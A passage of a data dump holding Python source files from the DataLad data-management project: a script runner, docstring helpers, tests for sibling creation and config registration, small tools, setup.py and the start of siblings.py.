datalad\"\"\"\n\nimport sys\nfrom . import __version__\nfrom .log import lgr\n\n\ndef usage(outfile, executable=sys.argv[0]):\n if '__main__.py' in executable:\n # That was -m datalad way to launch\n executable = \"%s -m datalad\" % sys.executable\n outfile.write(\"\"\"Usage: %s [OPTIONS] <file> [ARGS]\n\nPurpose:\n To provide FUSE-like operation whenever necessary files\n (as accessed by open, h5py.File) are requested, they get\n fetched.\n\nMeta-options:\n--help Display this help then exit.\n--version Output version information then exit.\n\"\"\" % executable)\n\n\ndef runctx(cmd, globals=None, locals=None):\n if globals is None:\n globals = {}\n if locals is None:\n locals = {}\n\n try:\n exec(cmd, globals, locals)\n finally:\n # good opportunity to avoid atexit I guess. pass for now\n pass\n\n\ndef main(argv=None):\n import os\n import getopt\n\n if argv is None:\n argv = sys.argv\n\n try:\n opts, prog_argv = getopt.getopt(argv[1:], \"\", [\"help\", \"version\"])\n # TODO: support options for whatever we would support ;)\n # probably needs to hook in somehow into commands/options available\n # under cmdline/\n except getopt.error as msg:\n sys.stderr.write(\"%s: %s\\n\" % (sys.argv[0], msg))\n sys.stderr.write(\"Try `%s --help' for more information\\n\"\n % sys.argv[0])\n sys.exit(1)\n\n # and now we need to execute target script \"manually\"\n # Borrowing up on from trace.py\n for opt, val in opts:\n if opt == \"--help\":\n usage(sys.stdout, executable=argv[0])\n sys.exit(0)\n\n if opt == \"--version\":\n sys.stdout.write(\"datalad %s\\n\" % __version__)\n sys.exit(0)\n\n try:\n from datalad_deprecated.auto import AutomagicIO\n except Exception as e:\n # we could just test for ModuleNotFoundError (which should be\n # all that would happen with PY3.6+, but be a little more robust\n # and use the pattern from duecredit\n if type(e).__name__ not in ('ImportError', 'ModuleNotFoundError'):\n lgr.error(\"Failed to import datalad_deprecated.auto \"\n \"due to %s\", str(e))\n sys.stderr.write(\"{}\\n\".format(\n \"The DataLad AutomagicIO functionality has been moved to an \"\n \"extension package. Please install the Python package \"\n \"`datalad_deprecated` to be able to use it.\"))\n sys.exit(1)\n\n sys.argv = prog_argv\n progname = prog_argv[0]\n sys.path[0] = os.path.split(progname)[0]\n\n try:\n with open(progname) as fp:\n code = compile(fp.read(), progname, 'exec')\n # try to emulate __main__ namespace as much as possible\n globs = {\n '__file__': progname,\n '__name__': '__main__',\n '__package__': None,\n '__cached__': None,\n }\n # Since used explicitly -- activate the beast\n aio = AutomagicIO(activate=True)\n lgr.info(\"Running code of %s\", progname)\n runctx(code, globs, globs)\n # TODO: see if we could hide our presence from the final tracebacks if execution fails\n except IOError as err:\n lgr.error(\"Cannot run file %r because: %s\", sys.argv[0], err)\n sys.exit(1)\n except SystemExit:\n pass\n\n\nif __name__ == '__main__':\n main()\n" }, { "alpha_fraction": 0.583229660987854, "alphanum_fraction": 0.5877901911735535, "avg_line_length": 28.5950927734375, "blob_id": "64edb8c43ca7de4ae22a5cd8b2a18a87fc8d4030", "content_id": "cca9ef6324808b04381fa5192f65bdc6267a0405", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9648, "license_type": "permissive", "max_line_length": 87, "num_lines": 326, "path": "/datalad/dochelpers.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Utils to help with docstrings etc.\n\nLargerly borrowed from PyMVPA (as of upstream/2.4.1-23-g170496e). Copyright of\nthe same developers as DataLad\n\"\"\"\n\nimport logging\nimport re\nimport textwrap\nimport os\nimport sys\nimport traceback\n\nfrom datalad.support.exceptions import CapturedException\n\nlgr = logging.getLogger(\"datalad.docutils\")\n\n__add_init2doc = False\n__in_ipython = False # TODO: determine exists('running ipython env')\n\n# if ran within IPython -- might need to add doc to init\nif __in_ipython:\n __rst_mode = False # either to do ReST links at all\n # if versions['ipython'] <= '0.8.1':\n # __add_init2doc = True\nelse:\n __rst_mode = True\n\n#\n# Predefine some sugarings depending on syntax convention to be used\n#\n# XXX Might need to be removed or become proper cfg parameter\n__rst_conventions = 'numpy'\nif __rst_conventions == 'epydoc':\n _rst_sep = \"`\"\n _rst_indentstr = \" \"\n\n def _rst_section(section_name):\n \"\"\"Provide section heading\"\"\"\n return \":%s:\" % section_name\nelif __rst_conventions == 'numpy':\n _rst_sep = \"\"\n _rst_indentstr = \"\"\n\n def _rst_section(section_name):\n \"\"\"Provide section heading\"\"\"\n return \"%s\\n%s\" % (section_name, '-' * len(section_name))\nelse:\n raise ValueError(\"Unknown convention %s for RST\" % __rst_conventions)\n\n\ndef _rst(s, snotrst=''):\n \"\"\"Produce s only in __rst mode\"\"\"\n if __rst_mode:\n return s\n else:\n return snotrst\n\n\ndef _rst_underline(text, markup):\n \"\"\"Add and underline RsT string matching the length of the given string.\n \"\"\"\n return text + '\\n' + markup * len(text)\n\n\ndef single_or_plural(single, plural, n, include_count=False):\n \"\"\"Little helper to spit out single or plural version of a word.\n \"\"\"\n ni = int(n)\n msg = \"%d \" % ni if include_count else \"\"\n if ni > 1 or ni == 0:\n # 1 forest, 2 forests, 0 forests\n return msg + plural\n else:\n return msg + single\n\n\ndef handle_docstring(text, polite=True):\n \"\"\"Take care of empty and non existing doc strings.\"\"\"\n if text is None or not len(text):\n if polite:\n return '' # No documentation found. Sorry!'\n else:\n return ''\n else:\n # Problem is that first line might often have no offset, so might\n # need to be ignored from dedent call\n if not text.startswith(' '):\n lines = text.split('\\n')\n text2 = '\\n'.join(lines[1:])\n return lines[0] + \"\\n\" + textwrap.dedent(text2)\n else:\n return textwrap.dedent(text)\n\n\ndef _indent(text, istr=_rst_indentstr):\n \"\"\"Simple indenter\n \"\"\"\n return '\\n'.join(istr + s for s in text.split('\\n'))\n\n\n__parameters_str_re = re.compile(r\"[\\n^]\\s*:?Parameters?:?\\s*\\n(:?\\s*-+\\s*\\n)?\")\n\"\"\"regexp to match :Parameter: and :Parameters: stand alone in a line\nor\nParameters\n----------\nin multiple lines\"\"\"\n\n\ndef _split_out_parameters(initdoc):\n \"\"\"Split documentation into (header, parameters, suffix)\n\n Parameters\n ----------\n initdoc : string\n The documentation string\n \"\"\"\n\n # TODO: bind it to the only word in the line\n p_res = __parameters_str_re.search(initdoc)\n if p_res is None:\n return initdoc, \"\", \"\"\n else:\n # Could have been accomplished also via re.match\n\n # where new line is after :Parameters:\n # parameters header index\n ph_i = p_res.start()\n\n # parameters body index\n pb_i = p_res.end()\n\n # end of parameters\n try:\n pe_i = initdoc.index('\\n\\n', pb_i)\n except ValueError:\n pe_i = len(initdoc)\n\n result = (initdoc[:ph_i].rstrip('\\n '),\n initdoc[pb_i:pe_i],\n initdoc[pe_i:])\n\n # XXX a bit of duplication of effort since handle_docstring might\n # do splitting internally\n return handle_docstring(result[0], polite=False).strip('\\n'), \\\n textwrap.dedent(result[1]).strip('\\n'), \\\n textwrap.dedent(result[2]).strip('\\n')\n\n\n__re_params = re.compile(r'(?:\\n\\S.*?)+$')\n__re_spliter1 = re.compile(r'\\n(?=\\S)')\n__re_spliter2 = re.compile('[\\n:]')\n\n\ndef _parse_parameters(paramdoc):\n \"\"\"Parse parameters and return list of (name, full_doc_string)\n\n It is needed to remove multiple entries for the same parameter\n like it could be with adding parameters from the parent class\n\n It assumes that previously parameters were unwrapped, so their\n documentation starts at the beginning of the string, like what\n should it be after _split_out_parameters\n \"\"\"\n entries = __re_spliter1.split(paramdoc)\n result = [(__re_spliter2.split(e)[0].strip(), e)\n for e in entries if e != '']\n lgr.log(\n 1,\n 'parseParameters: Given \"%s\", we split into %s',\n paramdoc, result,\n )\n return result\n\n\ndef get_docstring_split(f):\n \"\"\"Given a function, break it up into portions\n\n Parameters\n ----------\n f : function\n\n Returns\n -------\n\n (initial doc string, params (as list of tuples), suffix string)\n \"\"\"\n\n if not hasattr(f, '__doc__') or f.__doc__ in (None, \"\"):\n return None, None, None\n initdoc, params, suffix = _split_out_parameters(\n f.__doc__)\n params_list = _parse_parameters(params)\n return initdoc, params_list, suffix\n\n\ndef borrowdoc(cls, methodname=None):\n \"\"\"Return a decorator to borrow docstring from another `cls`.`methodname`\n\n It should not be used for __init__ methods of classes derived from\n ClassWithCollections since __doc__'s of those are handled by the\n AttributeCollector anyways.\n\n Common use is to borrow a docstring from the class's method for an\n adapter function (e.g. sphere_searchlight borrows from Searchlight)\n\n Examples\n --------\n To borrow `__repr__` docstring from parent class `Mapper`, do::\n\n @borrowdoc(Mapper)\n def __repr__(self):\n ...\n\n Parameters\n ----------\n cls\n Usually a parent class\n methodname : None or str\n Name of the method from which to borrow. If None, would use\n the same name as of the decorated method\n \"\"\"\n\n def _borrowdoc(method):\n \"\"\"Decorator which assigns to the `method` docstring from another\n \"\"\"\n if methodname is None:\n other_method = getattr(cls, method.__name__)\n else:\n other_method = getattr(cls, methodname)\n if hasattr(other_method, '__doc__'):\n method.__doc__ = other_method.__doc__\n return method\n return _borrowdoc\n\n\ndef borrowkwargs(cls=None, methodname=None, exclude=None):\n \"\"\"Return a decorator which would borrow docstring for ``**kwargs``\n\n Notes\n -----\n TODO: take care about ``*args`` in a clever way if those are also present\n\n Examples\n --------\n In the simplest scenario -- just grab all arguments from parent class::\n\n @borrowkwargs(A)\n def met1(self, desc, **kwargs):\n pass\n\n Parameters\n ----------\n methodname : None or str\n Name of the method from which to borrow. If None, would use\n the same name as of the decorated method\n exclude : None or list of arguments to exclude\n If function does not pass all ``**kwargs``, you would need to list\n those here to be excluded from borrowed docstring\n \"\"\"\n\n def _borrowkwargs(method):\n \"\"\"Decorator which borrows docstrings for ``**kwargs`` for the `method`\n \"\"\"\n if cls:\n if methodname is None:\n other_method = getattr(cls, method.__name__)\n else:\n other_method = getattr(cls, methodname)\n elif methodname:\n other_method = methodname\n\n # TODO:\n # method.__doc__ = enhanced_from(other_method.__doc__)\n\n mdoc, odoc = method.__doc__, other_method.__doc__\n if mdoc is None:\n mdoc = ''\n\n mpreamble, mparams, msuffix = _split_out_parameters(mdoc)\n opreamble, oparams, osuffix = _split_out_parameters(odoc)\n mplist = _parse_parameters(mparams)\n oplist = _parse_parameters(oparams)\n known_params = set([i[0] for i in mplist])\n\n # !!! has to not rebind exclude variable\n skip_params = exclude or [] # handle None\n skip_params = set(['kwargs', '**kwargs'] + skip_params)\n\n # combine two and filter out items to skip\n aplist = [i for i in mplist if not i[0] in skip_params]\n aplist += [i for i in oplist\n if not i[0] in skip_params.union(known_params)]\n\n docstring = mpreamble\n if len(aplist):\n params_ = '\\n'.join([i[1].rstrip() for i in aplist])\n docstring += \"\\n\\n%s\\n\" \\\n % _rst_section('Parameters') + _indent(params_)\n\n if msuffix != \"\":\n docstring += \"\\n\\n\" + msuffix\n\n docstring = handle_docstring(docstring)\n\n # Finally assign generated doc to the method\n method.__doc__ = docstring\n return method\n return _borrowkwargs\n\n\ndef exc_str(exc=None, limit=None, include_str=True):\n \"\"\"Temporary adapter\n\n The CapturedException should be available and be used directly instead.\n \"\"\"\n\n return str(CapturedException(exc))\n" }, { "alpha_fraction": 0.5670304894447327, "alphanum_fraction": 0.57012540102005, "avg_line_length": 31.31052589416504, "blob_id": "efc939665e28d079b12c3822a2cea163c1171acc", "content_id": "79ae3050aa0b70bf2d7aa8f1e4de407dd9a0a92c", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6139, "license_type": "permissive", "max_line_length": 80, "num_lines": 190, "path": "/datalad/distributed/tests/test_create_sibling_ghlike.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test create publication target on GIN\"\"\"\n\nimport os\nfrom os.path import basename\nfrom unittest.mock import patch\n\nimport requests\n\nfrom datalad.api import (\n Dataset,\n create_sibling_gin,\n)\nfrom datalad.downloaders.http import DEFAULT_USER_AGENT\nfrom datalad.tests.utils_pytest import (\n SkipTest,\n assert_in,\n assert_in_results,\n assert_raises,\n assert_result_count,\n assert_status,\n eq_,\n with_tempfile,\n)\n\n\n@with_tempfile\ndef test_invalid_call(path=None):\n # no dataset\n assert_raises(ValueError, create_sibling_gin, 'bogus', dataset=path)\n ds = Dataset(path).create()\n # without authorization\n # force disable any configured token\n with patch('datalad.distributed.create_sibling_ghlike.Token', None):\n assert_raises(ValueError, ds.create_sibling_gin, 'bogus')\n # unsupported name\n assert_raises(\n ValueError,\n ds.create_sibling_gin, 'bo gus', credential='some')\n\n # conflicting sibling name\n ds.siblings('add', name='gin', url='http://example.com',\n result_renderer='disabled')\n res = ds.create_sibling_gin(\n 'bogus', name='gin', credential='some', on_failure='ignore',\n dry_run=True)\n assert_status('error', res)\n assert_in_results(\n res,\n status='error',\n message=('already has a configured sibling \"%s\"', 'gin'))\n\n\n@with_tempfile\ndef test_dryrun(path=None):\n ds = Dataset(path).create()\n # see that the correct request would be made\n res = ds.create_sibling_gin('bogus', credential='some', dry_run=True)\n assert_result_count(res, 1)\n res = res[0]\n eq_(res['request_url'], 'https://gin.g-node.org/api/v1/user/repos')\n # we dont care much which user-agent, but there should be one\n assert_in('user-agent', res['request_headers'])\n # only a placeholder no-token makes it into the request\n assert_in('NO-TOKEN-AVAILABLE', res['request_headers']['authorization'])\n # correct name\n eq_(res['request_data']['name'], 'bogus')\n # public by default\n eq_(res['request_data']['private'], False)\n # it is important that we do not tell the portal to generate some\n # repo content\n eq_(res['request_data']['auto_init'], False)\n\n # org repo\n res = ds.create_sibling_gin('strangeorg/bogus', credential='some',\n dry_run=True)\n assert_result_count(res, 1)\n res = res[0]\n eq_(res['request_data']['name'], 'bogus')\n eq_(res['request_url'],\n 'https://gin.g-node.org/api/v1/org/strangeorg/repos')\n\n # recursive name, building\n subds = ds.create('subds')\n res = ds.create_sibling_gin(\n 'bogus', recursive=True, credential='some', dry_run=True)\n eq_(res[-1]['request_data']['name'], 'bogus-subds')\n\n # ignore unavailable datasets\n ds.drop('subds', what='all', reckless='kill', recursive=True)\n res = ds.create_sibling_gin(\n 'bogus', recursive=True, credential='some', dry_run=True)\n eq_(len(res), 1)\n\n\ndef check4real(testcmd, testdir, credential, api, delete_endpoint,\n access_protocol='https', moretests=None):\n token_var = f'DATALAD_CREDENTIAL_{credential.upper()}_TOKEN'\n if token_var not in os.environ:\n raise SkipTest(f'No {credential} access token available')\n\n ds = Dataset(testdir).create()\n assert_raises(\n ValueError,\n testcmd,\n 'somerepo',\n dataset=ds,\n api=api,\n credential='bogus',\n )\n\n reponame = basename(testdir).replace('datalad_temp_test', 'dltst')\n try:\n res = testcmd(\n reponame,\n dataset=ds,\n api=api,\n credential=credential,\n name='ghlike-sibling',\n access_protocol=access_protocol,\n )\n assert_in_results(\n res,\n status='ok',\n preexisted=False,\n reponame=reponame,\n private=False)\n assert_in_results(\n res,\n status='ok',\n action='configure-sibling',\n name='ghlike-sibling',\n )\n # now do it again\n ds.siblings('remove', name='ghlike-sibling', result_renderer='disabled')\n res = testcmd(\n reponame, dataset=ds, api=api, credential=credential,\n access_protocol=access_protocol,\n on_failure='ignore')\n assert_result_count(res, 1)\n assert_in_results(\n res,\n status='impossible',\n message=\"repository already exists\",\n preexisted=True,\n )\n # existing=skip must not \"fix\" this:\n # https://github.com/datalad/datalad/issues/5941\n res = testcmd(reponame, dataset=ds, api=api, existing='skip',\n access_protocol=access_protocol,\n credential=credential, on_failure='ignore')\n assert_result_count(res, 1)\n assert_in_results(\n res,\n status='error',\n preexisted=True,\n )\n # but existing=reconfigure does\n res = testcmd(reponame, dataset=ds, api=api, existing='reconfigure',\n access_protocol=access_protocol,\n credential=credential)\n assert_result_count(res, 2)\n assert_in_results(\n res,\n status='notneeded',\n preexisted=True,\n )\n assert_in_results(\n res,\n action='configure-sibling',\n status='ok',\n )\n if moretests:\n moretests(ds)\n finally:\n token = os.environ[token_var]\n requests.delete(\n '{}/{}'.format(api, delete_endpoint.format(reponame=reponame)),\n headers={\n 'user-agent': DEFAULT_USER_AGENT,\n 'authorization':\n f'token {token}',\n },\n ).raise_for_status()\n" }, { "alpha_fraction": 0.6098807454109192, "alphanum_fraction": 0.6121521592140198, "avg_line_length": 25.25373077392578, "blob_id": "fd1cc904845fb39bfca9e5c44c972227b7ee6e78", "content_id": "af2222cf94a54b4e4b7c779f318e67be3178e36e", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1761, "license_type": "permissive", "max_line_length": 64, "num_lines": 67, "path": "/datalad/support/tests/test_extensions.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "from datalad.tests.utils_pytest import (\n assert_in,\n assert_raises,\n eq_,\n nok_,\n ok_,\n)\n\nfrom ..extensions import (\n has_config,\n register_config,\n)\n\n\ndef test_register_config():\n nok_(has_config('datalad.testdummies.invalid'))\n assert_raises(\n ValueError,\n register_config,\n 'datalad.testdummies.invalid',\n title=None,\n dialog='yesno')\n nok_(has_config('datalad.testdummies.invalid'))\n\n cfgkey = 'datalad.testdummies.try1'\n nok_(has_config(cfgkey))\n register_config(\n cfgkey,\n 'This is what happens, when you do not listen to mama!',\n default_fn=lambda: 5,\n description='Try on-access default \"computation\"',\n type=int,\n dialog='question',\n scope='global',\n )\n\n from datalad.interface.common_cfg import definitions\n assert_in(cfgkey, definitions)\n # same thing, other part of the API\n assert_in(cfgkey, definitions.keys())\n # and yet another\n assert_in(cfgkey, [k for k, v in definitions.items()])\n # one more still\n assert_in(cfgkey, [k for k in definitions])\n # more smoke testing, we must have at least this one\n ok_(len(definitions))\n\n df = definitions[cfgkey]\n # on access default computation\n eq_(df['default'], 5)\n\n # we could set any novel property\n df['novel'] = 'unexpected'\n eq_(df.get('novel'), 'unexpected')\n eq_(df.get('toonovel'), None)\n # smoke test str/repr\n assert_in('mama', str(df))\n assert_in('mama', repr(df))\n\n # internal data structure for UI was assembled\n assert_in('ui', df)\n # more smoke\n assert_in('ui', df.keys())\n assert_in('ui', [k for k in df])\n nkeys = len(df)\n df.update(funky='seven')\n eq_(len(df), nkeys + 1)\n\n\n" }, { "alpha_fraction": 0.5607993006706238, "alphanum_fraction": 0.5642006993293762, "avg_line_length": 37.557376861572266, "blob_id": "e4f02ebb74e0c9af158e1bd2dc88f2a0bed925a4", "content_id": "7cb2a85ebdb28da78a15a90835b10e3617d5d545", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2352, "license_type": "permissive", "max_line_length": 87, "num_lines": 61, "path": "/tools/copy_urls_from_datalad.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 noet:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Little helper to copy all URLs which were mistakenly submitted to datalad\nremote instead of straight to web.\n\nMay be later could be RFed into some helper function if comes needed again\n\"\"\"\n\nfrom collections import defaultdict\nfrom datalad.support.annexrepo import AnnexRepo\nfrom datalad import lgr\nfrom tqdm import tqdm\n\n\ndef get_remote_urls(rec, remote):\n for k, v in rec.items():\n if v.get('description', '') in [remote, '[%s]' % remote]:\n return v.get('urls', [])\n return []\n\nif __name__ == '__main__':\n annex = AnnexRepo('.', create=False, init=False)\n # enable datalad special remote\n urls_to_register = defaultdict(list) # key: urls\n try:\n annex.call_annex([\"enableremote\", \"datalad\"])\n # go through each and see where urls aren't yet under web\n # seems might have also --in=datalad to restrict\n w = annex.whereis([], options=['--all'], output='full')\n lgr.info(\"Got %d entries\", len(w))\n for k, rec in tqdm(w.items()):\n datalad_urls = get_remote_urls(rec, 'datalad')\n web_urls = set(get_remote_urls(rec, 'web'))\n for url in datalad_urls:\n if url not in web_urls:\n if 'openneuro.s3' in url or 'openfmri.s3' in url:\n urls_to_register[k].append(url)\n else:\n lgr.warning(\"Found unexpected url %s\" % url)\n\n finally:\n # disable datalad special remote\n annex.remove_remote(\"datalad\") # need to disable it first\n lgr.info(\n \"Got %d entries which could get new urls\",\n len(urls_to_register)\n )\n for k, urls in tqdm(urls_to_register.items()):\n for url in urls:\n annex.call_annex([\n \"registerurl\", '-c', 'annex.alwayscommit=false', k, url])\n # to cause annex to commit all the changes\n annex.call_annex([\"merge\"])\n annex.gc(allow_background=False)\n" }, { "alpha_fraction": 0.5886337161064148, "alphanum_fraction": 0.601685106754303, "avg_line_length": 32.258243560791016, "blob_id": "79da6bc7fd226f3fc6f9ad00fdf053f878918e04", "content_id": "0f211bad61cf7c2dea66ce21636120ab9e0936d4", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6053, "license_type": "permissive", "max_line_length": 92, "num_lines": 182, "path": "/setup.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the DataLad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\nimport sys\nfrom os.path import dirname\nfrom os.path import join as opj\n\n# This is needed for versioneer to be importable when building with PEP 517.\n# See <https://github.com/warner/python-versioneer/issues/193> and links\n# therein for more information.\nsys.path.append(dirname(__file__))\n\nimport versioneer\nfrom _datalad_build_support.setup import (\n BuildConfigInfo,\n BuildManPage,\n datalad_setup,\n)\n\nrequires = {\n 'core': [\n 'platformdirs',\n 'chardet>=3.0.4', # rarely used but small/omnipresent\n 'colorama; platform_system==\"Windows\"',\n 'distro; python_version >= \"3.8\"',\n 'importlib-metadata >=3.6; python_version < \"3.10\"',\n 'importlib-resources >= 3.0; python_version < \"3.9\"',\n 'iso8601',\n 'humanize',\n 'fasteners>=0.14',\n 'packaging',\n 'patool>=1.7',\n 'tqdm>=4.32.0',\n 'typing_extensions>=4.0.0; python_version < \"3.11\"',\n 'annexremote',\n 'looseversion',\n ],\n 'downloaders': [\n 'boto',\n 'keyring>=20.0,!=23.9.0',\n 'keyrings.alt',\n 'msgpack',\n 'requests>=1.2',\n ],\n 'downloaders-extra': [\n 'requests_ftp',\n ],\n 'publish': [\n 'python-gitlab', # required for create-sibling-gitlab\n ],\n 'misc': [\n 'argcomplete>=1.12.3', # optional CLI completion\n 'pyperclip', # clipboard manipulations\n 'python-dateutil', # add support for more date formats to check_dates\n ],\n 'tests': [\n 'BeautifulSoup4', # VERY weak requirement, still used in one of the tests\n 'httpretty>=0.9.4', # Introduced py 3.6 support\n 'mypy',\n 'pytest',\n 'pytest-cov',\n 'pytest-fail-slow~=0.2',\n 'types-python-dateutil',\n 'types-requests',\n 'vcrpy',\n ],\n 'duecredit': [\n 'duecredit', # needs >= 0.6.6 to be usable, but should be \"safe\" with prior ones\n ],\n}\n\nrequires['full'] = sum(list(requires.values()), [])\n\n# Now add additional ones useful for development\nrequires.update({\n 'devel-docs': [\n # used for converting README.md -> .rst for long_description\n 'pypandoc',\n # Documentation\n 'sphinx>=4.3.0',\n 'sphinx-autodoc-typehints',\n 'sphinx-rtd-theme>=0.5.1',\n ],\n 'devel-utils': [\n 'asv', # benchmarks\n 'coverage',\n 'gprof2dot', # rendering cProfile output as a graph image\n 'psutil',\n 'pytest-xdist', # parallelize pytest runs etc\n # disable for now, as it pulls in ipython 6, which is PY3 only\n #'line-profiler',\n # necessary for accessing SecretStorage keyring (system wide Gnome\n # keyring) but not installable on travis, IIRC since it needs connectivity\n # to the dbus whenever installed or smth like that, thus disabled here\n # but you might need it\n # 'dbus-python',\n 'scriv', # changelog\n ],\n})\nrequires['devel'] = sum(list(requires.values()), [])\n\n\n# let's not build manpages and examples automatically (gh-896)\n# configure additional command for custom build steps\n#class DataladBuild(build_py):\n# def run(self):\n# self.run_command('build_manpage')\n# self.run_command('build_examples')\n# build_py.run(self)\n\ncmdclass = {\n 'build_manpage': BuildManPage,\n # 'build_examples': BuildRSTExamplesFromScripts,\n 'build_cfginfo': BuildConfigInfo,\n # 'build_py': DataladBuild\n}\n\nsetup_kwargs = {}\n\n# normal entrypoints for the rest\n# a bit of a dance needed, as on windows the situation is different\nentry_points = {\n 'console_scripts': [\n 'datalad=datalad.cli.main:main',\n 'git-annex-remote-datalad-archives=datalad.customremotes.archives:main',\n 'git-annex-remote-datalad=datalad.customremotes.datalad:main',\n 'git-annex-remote-ria=datalad.customremotes.ria_remote:main',\n 'git-annex-remote-ora=datalad.distributed.ora_remote:main',\n 'git-credential-datalad=datalad.local.gitcredential_datalad:git_credential_datalad',\n ],\n}\nsetup_kwargs['entry_points'] = entry_points\n\nclassifiers = [\n 'Development Status :: 5 - Production/Stable',\n 'Environment :: Console',\n 'Intended Audience :: Developers',\n 'Intended Audience :: Education',\n 'Intended Audience :: End Users/Desktop',\n 'Intended Audience :: Science/Research',\n 'License :: DFSG approved',\n 'License :: OSI Approved :: MIT License',\n 'Natural Language :: English',\n 'Operating System :: POSIX',\n 'Programming Language :: Python :: 3 :: Only',\n 'Programming Language :: Unix Shell',\n 'Topic :: Communications :: File Sharing',\n 'Topic :: Education',\n 'Topic :: Internet',\n 'Topic :: Other/Nonlisted Topic',\n 'Topic :: Scientific/Engineering',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n 'Topic :: Software Development :: Version Control :: Git',\n 'Topic :: Utilities',\n]\nsetup_kwargs['classifiers'] = classifiers\n\nsetup_kwargs[\"version\"] = versioneer.get_version()\ncmdclass.update(versioneer.get_cmdclass())\n\ndatalad_setup(\n 'datalad',\n description=\"data distribution geared toward scientific datasets\",\n install_requires=\n requires['core'] + requires['downloaders'] +\n requires['publish'],\n python_requires='>=3.7',\n project_urls={'Homepage': 'https://www.datalad.org',\n 'Developer docs': 'https://docs.datalad.org/en/stable',\n 'User handbook': 'https://handbook.datalad.org',\n 'Source': 'https://github.com/datalad/datalad',\n 'Bug Tracker': 'https://github.com/datalad/datalad/issues'},\n extras_require=requires,\n cmdclass=cmdclass,\n include_package_data=True,\n **setup_kwargs\n)\n" }, { "alpha_fraction": 0.4243542551994324, "alphanum_fraction": 0.4292742908000946, "avg_line_length": 31.520000457763672, "blob_id": "51762394eb2b5bb384aac75c937a442ef13fdebb", "content_id": "0c58af0e30e5a42c44c65ebb0b4c2bedf4bc3dc5", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 813, "license_type": "permissive", "max_line_length": 86, "num_lines": 25, "path": "/tools/which.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n\nimport os\nimport os.path as op\nimport sys\nimport subprocess\n\nif __name__ == '__main__':\n cmd = sys.argv[1]\n extra = sys.argv[2:]\n for path in os.environ['PATH'].split(os.pathsep):\n for ext in '', '.exe', '.bat', '.com':\n exe = op.join(path, cmd + ext)\n # print(exe)\n if op.lexists(exe):\n if extra:\n r = subprocess.run([exe] + extra, capture_output=True, check=True)\n print(exe, r.returncode == 0 and \"ok\" or \"failed\")\n for o in \"stdout\", \"stderr\":\n out = getattr(r, o)\n if out:\n print(f'{o}:')\n print(out.decode())\n else:\n print(exe)\n" }, { "alpha_fraction": 0.5524734258651733, "alphanum_fraction": 0.5560048818588257, "avg_line_length": 37.79889678955078, "blob_id": "c8d7b6a281d4e6c1197a9ff7e4dd266e8c2b2867", "content_id": "8b77524fb7a4dd4293cab9bc33413c2d69119c0b", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 35113, "license_type": "permissive", "max_line_length": 147, "num_lines": 905, "path": "/datalad/distribution/siblings.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Plumbing command for managing sibling configuration\"\"\"\n\n__docformat__ = 'restructuredtext'\n\n\nimport logging\nimport os\nimport os.path as op\nfrom urllib.parse import urlparse\n\nimport datalad.support.ansi_colors as ac\nfrom datalad.distribution.dataset import (\n Dataset,\n require_dataset,\n)\nfrom datalad.distribution.update import Update\nfrom datalad.downloaders.credentials import UserPassword\nfrom datalad.interface.base import (\n Interface,\n build_doc,\n eval_results,\n)\nfrom datalad.interface.common_opts import (\n annex_group_opt,\n annex_groupwanted_opt,\n annex_required_opt,\n annex_wanted_opt,\n as_common_datasrc,\n inherit_opt,\n location_description,\n publish_by_default,\n publish_depends,\n recursion_flag,\n recursion_limit,\n)\nfrom datalad.interface.results import get_status_dict\nfrom datalad.interface.utils import generic_result_renderer\nfrom 